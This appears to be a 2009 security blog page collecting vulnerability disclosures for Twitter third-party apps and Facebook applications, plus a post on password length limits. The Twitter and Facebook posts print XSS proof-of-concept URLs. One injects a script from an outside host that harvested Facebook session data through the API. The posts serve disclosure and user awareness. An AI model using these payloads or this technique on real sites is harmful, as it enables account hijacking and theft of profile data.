MoTB #04: CSRF in BigTweet

What is BigTweet
“BigTweet was developed by Scott Carter (@scott_carter) as a way to interact more effectively with various networks from the Web. When you click on the BigTweet bookmarklet, a window appears in the middle of your current web page. Use it to post to Twitter or FriendFeed and then return to what you were doing. It doesn’t get any faster.” (BigTweet home page)

Twitter affect
BigTweet can be used to send tweets from any web page by using a bookmarklet.
BigTweet is using Username/Password authentication in order to utilize the Twitter API.

Popularity rate
While Bigtweet is not on any of the top Twitter services lists, it has an easy to integrate bookmarklet interface – 1 twit

Vulnerability: Cross-Site Request Forgery in BigTweet upate.json.
Status: Patched.
Details: The bigtweet update.json web page did not use authenticity code in order to validate that the HTTP post is coming from the bigtweet web application.
Screenshots:

Note: While the proof-of-concept in the screenshots used the “xxx” twitter user, the page will actually send a tweet for the currently logged-in user (in the PoC – @avivra). Any bigtweet.com registered user could have been used instead of xxx.

Vendor response rate
Vulnerability was fully fixed 22 hours after it has been reported.
Scott Carter, the developer of BigTweet, is also the one who came up with the idea of having a security best practices document for API developers. Alex Payne from Twitter has written such document last week. Excellent – 5 twits.

Password Length and Complexity for Social Media Sites

July 1st was “Twittersec” day as coined by @hevnsnt over at I-Hacked.com to designate July 1st as change your Twitter password day. Why? Mostly because July is the “month of Twitter bugs” created by a security researcher in which he will announce a bug in a “3rd party Twitter application” everyday for the month of July to raise awareness on security issues with the Twitter API. Technically, this should be “month of 3rd party” Twitter bugs but whatever. Either way it will raise awareness about some of the security issues of Twitter and 3rd party applications.

ANYWAY, back to my point….I sent out some tweets about changing your Twitter password and now being a good time to use a password manager like Keepass to manage multiple, complex passwords for everything…not just social media sites. One problem though is that each site might have different password length and complexity requirements. This becomes an annoying issue when you choose a randomly generated password like I suggest when using a password manager. You will encounter many sites that have specific requirements and others that do not. Obviously, the longer and more complex the password is the harder it is to crack so I suggest going as long as you can. Sad that there are these limitations on certain sites (blame the site developers) but if you set your random password generator to a very large number (I recommend at least 20 with a mix of everything you can throw at it including white spaces if the site will let you), it’s as good as your going to get.

Keep in mind, some applications even supported by the site (like the Facebook app for BlackBerry and iPhone) might not like passwords over a certain length or even certain special characters…you will know once you use these apps. Also, I mention Keepass as a password manager because you can use it on a BlackBerry or Windows Mobile device as well…an iPhone version is being worked on. So here you go…max password lengths for the major social media sites:

Twitter
None. I tried a 500 character password with everything but white spaces and it worked.

Facebook
None. I tried a 1000 character password with everything but white spaces and it worked.

MySpace
10 characters! Wow…really bad. Now I know another reason MySpace sucks.

LinkedIn
16 characters! This is interesting. LinkedIn truncates the password to 16 characters! Even if you put in a password larger then 16 characters it will only use the first 16, you can actually see this when entering in a password. No user notification, no info about this in the ‘help’ section. Sneaky and evil.

YouTube
None. Your account is tied to your Google account so is kind of a pain to change…but I didn’t find any issues with length or complexity.

On another note…I wonder if Twitter and Facebook truncate the passwords at a certain length and don’t tell you? Not sure…but it would be interesting to find out. This is another bad design as a they could easily just hash the entire password (which is a certain manageable length) and the hash is stored in the database not the large character password. Does this mean that sites like MySpace and LinkedIn are storing passwords in clear text? Also, I have run into other sites (non-social network) that actually truncate the password because when you try to login with an overly complex password…you get denied! Then you enter the cycle of doom…resetting your password thinking you fat fingered that password to begin with over and over. :-/

Are social media password limitations working against you?
Finally, just a quick point on this. Social media sites like MySpace and LinkedIn should NEVER have any limitations on password length or complexity. Certain complexity restrictions (like white space or strange characters) I could understand since you would have to use these passwords on mobile devices and other integrated apps. However, there are no technical limitations of just hashing the passwords to a constant length…and we all know storing passwords in a database in clear text is never a good thing.

Shouldn’t these social media sites that you already give your personal information to be trying to protect you the user as best as they can by letting you set a long and complex password? Let’s hope MySpace and LinkedIn get better at this real soon!


MoTB #03: TwitWall Persistent XSS

What is TwitWall
“TwitWall is the easy-to-use, quick-to-blast-out, instant blog companion for Twitter. With TwitWall, you can embed your favorite videos and widgets, upload your photos, mp3 music or podcasts, – you name it..” (TwitWall home page)

Twitter affect
TwitWall can be used to send tweets and follow/unfollow other Twitter users.
TwitWall is using OAuth authentication token in order to utilize the Twitter API.

Popularity rate
Though it’s here since Summer 2008, it has yet to gain enough user base to get into any of the top twitter services lists – 0.5 twits

Vulnerability: Persistent Cross-Site in TwitWall entry view page.
Status: Patched.
Details: TwitWall allows HTML to be embedded in the wall entries. According to the vendor this was done because “our users with non-malicious intentions enjoy using our html editor”. Unfortunately, the entry view page does not santize scripts and events that came along with the HTML.
This vulnerability could have allowed an attacker to send tweets, follow/unfollow others on behalf of its victims.
Screenshots:

Vendor response rate
Vulnerability was fully fixed 20 hours after it has been reported. Excellent – 5 twits.

MoTB #02: Reflected XSS in HootSuite

What is HootSuite
“HootSuite is the ultimate Twitter toolbox. With HootSuite, you can manage multiple Twitter profiles, add multiple editors, pre-schedule tweets, and measure your success. HootSuite lets you manage your entire Twitter experience from one easy-to-use interface.” (HootSuite about page)

Twitter affect
HootSuite can be used to send tweets, direct messages and follow/unfollow other Twitter users from multiple Twitter accounts.
HootSuite is using Username/Password authentication in order to utilize the Twitter API.

Popularity rate
27th place in the Top 100 Twitter Services, according to “The Museum of Modern Betas” – 3.5 twits

Vulnerability: Reflected Cross-Site in the “add-acount” page.
Status: Patched.
Details: The HootSuite “add-account” page does not encode HTML entities in the “pageMode”
variable, which can allow the injection of scripts.
This vulnerability could allowed an attacker to send tweets, direct messages and to follow/unfollow others on behalf of its victims.
Proof-of-Concept: http://hootsuite.com/twitter/add-account?height=240&width=280&modal=true&pageMode=xxx%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
Screenshot:

Vendor response rate
Vulnerability was fixed two hours after it has been reported. Excellent – 5 twits.

MoTB #01: Multiple vulnerabilities in bit.ly service

What is bit.ly
“bit.ly allows users to shorten, share, and track links (URLs). Reducing the URL length makes sharing easier. bit.ly can be accessed through our website, bookmarklets and a robust and open API. bit.ly is also integrated into several popular third-party tools such as Tweetdeck.” (bit.ly about page)


Twitter affect
bit.ly can be used to send tweets with the shortened URLs through a form on their website, or a simple GET request.
bit.ly is using the OAuth authentication tokens in order to send tweets via the Twitter API.

Popularity rate
Second most popular URL shortening service in the wild – 4.5 twits

Vulnerabilities
1) Reflected Cross-Site Scripting in the “url” query parameter.
Status: Patched.
Details: This vulnerability was first reported by Mario Heiderich on May 18th 2009, on twitter.
A week later, I found that this vulnerability got fixed. Unfortunately, after playing with it a bit, I figured that it was only partially fixed. Instead of encoding the HTML entities, bit.ly developers have decided to strip the <> characters. E.g. this proof-of-concept would have popup an alert on IE7:
htttp://bit.ly/?url=”%20style=”color:expression(document.body.onload=function()%20{alert(1)})
The following is the screenshot of the PoC:

Several days ago, after a long discussion with Mario, bit.ly has finally fully fixed this vulnerability.

2) Reflected Cross-Site Scripting in the keywords parameter.
Status: Patched.
Details: This vulnerability was reported by Mike Bailey on June 24th 2009. See Mike’s advisory for more details: http://skeptikal.org/2009/06/parsing-quirk-causes-bitly-xss.html
This vulnerability was fixed by bit.ly yesterday.

3) Reflected POST Cross-Site Scripting in the username field of the login page
Status: Patched
Details: This vulnerability was reported by Mario Heiderich. See Mario’s advisory for more details: http://heideri.ch/bit.ly.txt
This vulnerability was fixed by bit.ly yesterday.

4) Persistent Cross-Site Scripting in the content-type field of the URL info page
Status: *Unpatched* Patched.
Details: This vulnerability was submitted by Mike Bailey on June 25th 2009.
Whenever a URL of a website gets shortened by bit.ly service, an information page is created for the URL, with statistics and metadata about the website.
One of the metadata information being stored by bit.ly is the content-type response header of the shortened URL page. This information of-course can be easily changed.
bit.ly fails to encode HTML entities while displaying the content-type information, and therefore allows injection of scripts to the page.
Live proof-of-concept can be found here: http://bit.ly/info/JvH83
Screenshot of the PoC (just in case the live demo will be removed):

Vendor response rate
It took bit.ly a month and a half to fix simple XSS vulnerabilities. Very poor – 0.5 twits.

In conclusion
bit.ly has a large user base (who doesn’t click bit.ly links?). However, with such a poor response rate to security vulnerabilities, and with such a poorly coded website, in terms of security, we can only hope for the best. Please be careful clicking those shortened URLs…

[Update – 3 hours into Month of Twitter Bugs] bit.ly have finally fixed the last vulnerability.

A Few Clarifications

Why bother highlighting privacy problems on Facebook?  Isn’t privacy just an illusion anyway? With the way Facebook currently operates, users should probably assume that advertisers, developers, and hackers can access all of the information they post. However, most users are not aware of this, and fully believe in the privacy controls Facebook provides. Facebook needs to address privacy problems to match user confidence or better educate users on how easily others can access their data.

Hasn’t Facebook patched the holes that allow access to profile data? Those behind FBHive.com should be commended for the privacy hole they uncovered, which Facebook did patch. However, the privacy problems mentioned here remain unpatched. SuperPoke has patched the specific hole used in my demonstration hack, but other applications are still vulnerable to an identical attack.

Aren’t you simply highlighting problems in Facebook applications? Isn’t Facebook itself more secure? Mark it down: A vulnerability in a Facebook application is a vulnerability in Facebook itself. Since all applications are granted access to a wealth of user information and can perform many actions that directly affect a user, application holes can be exploited to the point of differing little from actually hacking a user’s profile.

Are these hacks really that serious if they require a user to click a special link? Hacks that do not require user intervention are certainly more powerful. However, many security researchers will affirm that getting a user to click on a link is not that difficult. Also, many of these hacks can work invisibly on what appears to be an otherwise harmless page. Finally, applications have many viral channels available to them, and these can be exploited by an application attack or a rogue application to compromise more users.

Doesn’t Facebook prevent advertisers from accessing personally identifiable information? For advertisements served by Facebook itself, the site does prevent such access. Unfortunately, several advertising networks for Facebook applications, such as SocialCash, can and do access personally identifiable information for targeting their ads. While this appears to be a clear TOS violation, Facebook has not shown interest in addressing this particular problem.  Two ad networks were shut down recently, but apparently for deceptive ads and not for the user information they accessed.

Can Facebook enable third-party applications at all and still enforce user privacy? Security researchers may disagree on this particular question, but I do think it clear that Facebook could do far more to protect user privacy. The Facebook Platform currently ignores important security techniques that have led to problems such as my recent application hacks. For example, allowing every application full access to user information contributes to making the hacks so serious.

Instapaper Facebook Digg Twitter FriendFeed Delicious Yahoo Bookmarks Google Bookmarks

Still Don’t Think This is Serious?

Remember that Facebook hack I posted a few days ago that exploited an XSS hole in SuperPoke to harvest users’ profile information? I mentioned in my follow-up posts that the hack was not specific to SuperPoke and could be adapted to an XSS hole in another application.

Such as FunSpace.

This application, formerly known as FunWall, has over 11.4 million monthly active users, and, according to a recent review by Inside Facebook, is the most active application on Facebook in terms of daily active users.  That means that an attacker has a high probability of success without resorting to a clickjacking authorization.  FunSpace is also a Facebook Verified Application.

And it does, in fact, have an XSS hole.  How long did it take me to find the hole?  Less than an hour.

All of this means that right this second, if I so desired, I could replace one file at theharmonyguy.com and previous links to the attack page would once again work.  Visiting the attack page would again forward you to a page with nearly all of your profile data displayed.  I’ve already put together the updated version of the attack.

I say this to illustrate that the four privacy problems I originally posted a few days ago are still very much problems, and that this type of attack can continue as long as Facebook does not respond to them.  I originally exploited SuperPoke, now I can exploit FunSpace, tomorrow I can possibly exploit another popular application.  But playing whack-a-mole with application bugs will not solve anything.

Finally, I’d like to hear your feedback on whether I should update the attack page and make it live again.  It’s not one easily illustrated by screenshots, since the results page is full of personal data.

Update: Considering the success of this hack, I’ve started going through AllFacebook’s list of top Facebook applications by monthly active users and hunting for XSS holes in each.  I quickly found a means of FBML injection in Causes, which is second on the leaderboard and another Facebook Verified Application.  Launching an FBML-based attack is proving to be more complicated, but still appears to be possible.  In fact, even embedding external scripts with access to the user’s session secret is not as difficult as you might think.

Update 2: Decided to check Bumper Sticker (nearly 5 million MAU) about 10 minutes ago, and quickly found an FBML injection hole.

Update 3 (6/26): Earlier today I posted the new attack code, and within about three hours, FunSpace patched the hole.  I haven’t found another XSS hole in an HTML-based Facebook application, and haven’t yet worked out the details of an FBML-based attack, but I’m confident the hack could still be relaunched. People need to understand that nearly any application XSS vulnerability will enable this type of attack.

Instapaper Facebook Digg Twitter FriendFeed Delicious Yahoo Bookmarks Google Bookmarks

Facebook Attack Technical Details

One could argue that this was more of a SuperPoke attack, but I think it demonstrates that in many cases, hacking a Facebook application is little different from hacking Facebook.

I’ve already posted a general outline of how the attack worked, but here I’ll follow that up with more technical specifics.

The attack page, http://theharmonyguy.com/facebook-privacy/index.php, appeared to be a generic error page.  The page actually loaded an invisible iframe, following a standard clickjacking model.  As mentioned before, the clickjacking was only needed in case a user had not installed SuperPoke.  The iframe redirected to a Facebook authorization page for SuperPoke, with the post-redirect URI containing the actual XSS attack.  If a user had not authorized SuperPoke, nothing would appear to happen after the fake error page loaded, leading them to click the fake redirect link.  The supposed link was positioned over the “Allow Access” button on the Facebook page.  Once clicked, SuperPoke became authorized and the XSS was executed.  If a user already had SuperPoke on their profile, the XSS attack executed right away without any user intervention.

The heart of the attack came in the XSS exploit.  Previously, SuperPoke would load a page containing an error message if a user tried to perform a disallowed action.  The error message was part of the query string for the page, and as I noticed about a year and a half ago, this message was simply added to the page without any escaping.  Originally this allowed for FBML injection, but SuperPoke has since become an HTML-based application that is loaded in an iframe.  Thus one could replace the error message with arbitrary HTML, including script tags.  The specific URI loaded by my attack was this:

http://apps.facebook.com/superpokey/sp_main/?CXNID=1000005.6NXC&fb_force_mode=iframe&error=%3Cscript+src%3D%22http%3A%2F%2Ftheharmonyguy.com%2Fi.js%22%3E%3C%2Fscript%3E

As you can see, the “error message” in this URI is actually an encoded script tag which loads a JavaScript file stored on theharmonyguy.com.  This script is then executed within the context of the application page.

Since the application page is loaded by Facebook in an iframe, Facebook automatically appends a query string containing session information to the URI of the page.  The script simply checked the location variable to capture this information.  It then generated a list of parameters for a Facebook API call to fql.query with a pre-written FQL query to retrieve user profile data.  The session variables include fb_sig_ss, and by setting ss=1 in the API call, one can generate the MD5 signature needed to make a successful request.  Publicly available JavaScript code was used to create the signature.

Originally, the script made the API call and forwarded the end user to a page (http://theharmonyguy.com/facebook-privacy/results.html) which displayed the profile data.  However, I wanted to be very careful about how the profile information was transferred, and including the data in a URI made it too long to work smoothly.  (Internet Explorer does not always handle extremely long addresses well.)  In the end, I elected to instead transfer the URI for a JavaScript API call to the results page and let it load the data.

Hence, the first script encoded the URI using Base64 and attached that to the address of the forwarded page.  (Thus my warning not to share the URI of the results page, though even if someone harvested the API call, logging out of Facebook would destroy the session variables.)  The results page again checked the URI, decoded the appended data, and used a standard cross-domain JSON technique to make the API request.  The page then loaded the results below my explanatory message for the user to see.  Since the data was loaded and displayed at runtime, I never actually stored anyone’s profile information.  Note that this landing page was hosted on theharmonyguy.com, not slide.com, apps.facebook.com, or facebook.com.

The pages are still online, though a bit modified since the original attack no longer works, thanks to SuperPoke changing the behavior of error messages on their pages.  The source code is obfuscated, but clean code is available upon request (theharmonyguy via gmail.com).

This attack was merely proof-of-concept and did not take full advantage of every possibility.  Notably, the XSS attack could have executed any API call available with a user session key, which includes just about any FQL query.  This could have also allowed the attack to spread virally, or clickjacking could be employed to send Facebook messages on behalf of a user.

Note, however, that if a user already had SuperPoke authorized, no clickjacking was necessary to execute the payload – the user simply had to load the initial page.  And since SuperPoke is a very popular application, an attacker would have a high probability of this happening.  To put this in perspective, I could have been harnessing the profile data of every SuperPoke user who visited my blog recently simply by embedding an iframe in the HTML source.

As I mentioned, the API call could have been made and the profile data stored on a third-party server on initial execution.  My specific attack forwarded the user to the results page as a courtesy to let them know what could have just happened.  Also, if an API request was made in the initial script, Facebook would see the referer as the exploited application’s URI.  The REST server would have no way to distinguish between a legitimate request and one produced by an attack.

By the way, this is another reason why I get concerned about application advertising networks, such as SocialCash, using external script access to load targeting data.  Facebook can talk about monitoring privacy, but the requests made from these ad networks are also indistinguishable from requests made by an application itself.

While SuperPoke has patched the vulnerability used here, the fact remains that any other Facebook application which has an XSS hole such as this one could be exploited as well.  In fact, my code in no way depends on SuperPoke, and could easily be embedded in another application with the same results.

Also, to the best of my knowledge, Facebook has not taken any measures to avoid clickjacking attacks.  People can argue about how much social engineering is involved to get users to click on malicious links, but I think any security researcher can tell you such matters are not as difficult as they may sound, particularly when viral channels are available.

Again, this particular attack only scratched the surface of what could be possible in the future.  For instance, this attack used clickjacking to get users to install a recreational application, but it could have easily authorized a rogue application.  And while this particular attack no longer works, the larger privacy problems that made it possible remain until Facebook takes action.

Update (6/25): Newer versions of the hack utilize applications besides SuperPoke, but the technique remains the same.

Instapaper Facebook Digg Reddit Twitter FriendFeed Delicious Yahoo Bookmarks Google Bookmarks

1 24 25 26 27 28 29